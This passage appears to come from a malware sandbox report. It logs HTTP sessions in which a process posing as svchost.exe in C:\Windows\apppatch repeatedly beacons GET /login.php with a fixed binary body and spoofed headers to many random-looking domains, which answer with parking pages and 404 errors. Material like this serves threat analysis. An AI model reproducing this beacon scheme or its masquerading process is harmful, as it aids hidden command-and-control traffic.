Aug 23, 2024 18:43:06.834067106 CEST	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 23 Aug 2024 16:43:06 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	63518	44.221.84.105	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:06.448183060 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:06.931480885 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d106e65ece3c227125fd2b7f88318a22\|8.46.123.33\|1724431386\|1724431386\|0\|1\|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	63519	103.224.212.210	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:06.638278008 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:07.276716948 CEST	340	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:43:07 GMT server: Apache set-cookie: __tad=1724431387.5010053; expires=Mon, 21-Aug-2034 16:43:07 GMT; Max-Age=315360000 location: http://ww25.lyxynyx.com/login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	63520	15.197.240.20	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:06.703964949 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	63521	154.85.183.50	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:06.808324099 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:07.701025009 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:43:07 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Aug 23, 2024 18:43:07.702388048 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:08.050574064 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:43:07 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	63522	103.224.182.252	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:06.850079060 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:07.468786955 CEST	338	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:43:07 GMT server: Apache set-cookie: __tad=1724431387.3029143; expires=Mon, 21-Aug-2034 16:43:07 GMT; Max-Age=315360000 location: http://ww16.vofycot.com/login.php?sub1=20240824-0243-077d-8f61-d4c58a818681 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	63524	199.59.243.226	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:07.630143881 CEST	356	OUT	GET /login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431387.5010053 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:08.112518072 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:43:07 GMT content-type: text/html; charset=utf-8 content-length: 1226 x-request-id: 57775652-f38d-471f-b828-6950ec7437ed cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ID/eQIyjmFQ+IazXrz3lYV0cNFXDz//4K/74t5tgDqiHL6ibc3tuSRWMWt9ZGnKO5rZgpx/EVQeEcpcOFNHDfA== set-cookie: parking_session=57775652-f38d-471f-b828-6950ec7437ed; expires=Fri, 23 Aug 2024 16:58:08 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 44 2f 65 51 49 79 6a 6d 46 51 2b 49 61 7a 58 72 7a 33 6c 59 56 30 63 4e 46 58 44 7a 2f 2f 34 4b 2f 37 34 74 35 74 67 44 71 69 48 4c 36 69 62 63 33 74 75 53 52 57 4d 57 74 39 5a 47 6e 4b 4f 35 72 5a 67 70 78 2f 45 56 51 65 45 63 70 63 4f 46 4e 48 44 66 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ID/eQIyjmFQ+IazXrz3lYV0cNFXDz//4K/74t5tgDqiHL6ibc3tuSRWMWt9ZGnKO5rZgpx/EVQeEcpcOFNHDfA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Aug 23, 2024 18:43:08.112626076 CEST	867	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTc3NzU2NTItZjM4ZC00NzFmLWI4MjgtNjk1MGVjNzQzN2VkIiwicGFnZV90aW1lIjoxNzI0NDMxMzg4LCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	63525	64.190.63.136	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:08.065329075 CEST	354	OUT	GET /login.php?sub1=20240824-0243-077d-8f61-d4c58a818681 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431387.3029143 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:08.740223885 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:43:08 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EekGA+oH2Ihj8JyBw+KG2z5Iv4aiTUbXmgO3RFg+rVbRZBR/vSc/Sf8ZZmNvQDQyGBVuP3lHgFeIjMo+Bhpffw== last-modified: Fri, 23 Aug 2024 16:43:08 GMT x-cache-miss-from: parking-89b87dbbb-6swmv server: Parking/1.0 Data Raw: 32 45 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 65 6b 47 41 2b 6f 48 32 49 68 6a 38 4a 79 42 77 2b 4b 47 32 7a 35 49 76 34 61 69 54 55 62 58 6d 67 4f 33 52 46 67 2b 72 56 62 52 5a 42 52 2f 76 53 63 2f 53 66 38 5a 5a 6d 4e 76 51 44 51 79 47 42 56 75 50 33 6c 48 67 46 65 49 6a 4d 6f 2b 42 68 70 66 66 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED] Data Ascii: 2E4<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EekGA+oH2Ihj8JyBw+KG2z5Iv4aiTUbXmgO3RFg+rVbRZBR/vSc/Sf8ZZmNvQDQyGBVuP3lHgFeIjMo+Bhpffw==><head><meta charset="utf-8"><title>vofycot.com - This website is for sale! - vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and best
Aug 23, 2024 18:43:08.740251064 CEST	1236	IN	Data Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com ha595s it all. We hope you find what you are searching for!"><link rel="icon" type="ima
Aug 23, 2024 18:43:08.740272045 CEST	1236	IN	Data Raw: 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d Data Ascii: ay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visibl
Aug 23, 2024 18:43:08.740286112 CEST	1236	IN	Data Raw: 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 Data Ascii: nce:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484
Aug 23, 2024 18:43:08.740295887 CEST	1236	IN	Data Raw: 6c 61 69 6d 65 72 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e Data Ascii: laimer a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-i
Aug 23, 2024 18:43:08.740309954 CEST	847	IN	Data Raw: 74 69 76 65 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d Data Ascii: tive-text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webk
Aug 23, 2024 18:43:08.740322113 CEST	1236	IN	Data Raw: 31 30 36 32 0d 0a 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 2d 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 Data Ascii: 1062sabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;bord
Aug 23, 2024 18:43:08.740340948 CEST	1236	IN	Data Raw: 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 32 36 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 Data Ascii: on:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slid
Aug 23, 2024 18:43:08.740350962 CEST	1236	IN	Data Raw: 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e Data Ascii: container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:
Aug 23, 2024 18:43:08.740394115 CEST	1236	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b Data Ascii: ;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:un
Aug 23, 2024 18:43:08.745203972 CEST	1236	IN	Data Raw: 63 6f 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 76 6f 66 79 63 6f 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 50 72 69 63 65 22 3a 2d 32 2c 22 64 6f 6d 61 69 6e 43 75 72 72 65 6e 63 79 22 3a 22 22 2c 22 61 64 75 6c 74 46 6c 61 Data Ascii: cot.com","domainName":"vofycot.com","domainPrice":-2,"domainCurrency":"","adultFlag":false,"pu":"//ww16.vofycot.com","dnsh":true,"dpsh":false,"toSell":true,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQAD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	63535	15.197.240.20	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:17.260711908 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	62684	64.225.91.73	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:28.085216045 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:28.678643942 CEST	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 23 Aug 2024 16:43:28 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	62685	72.52.179.174	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:28.629759073 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	62686	72.52.179.174	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:29.170671940 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
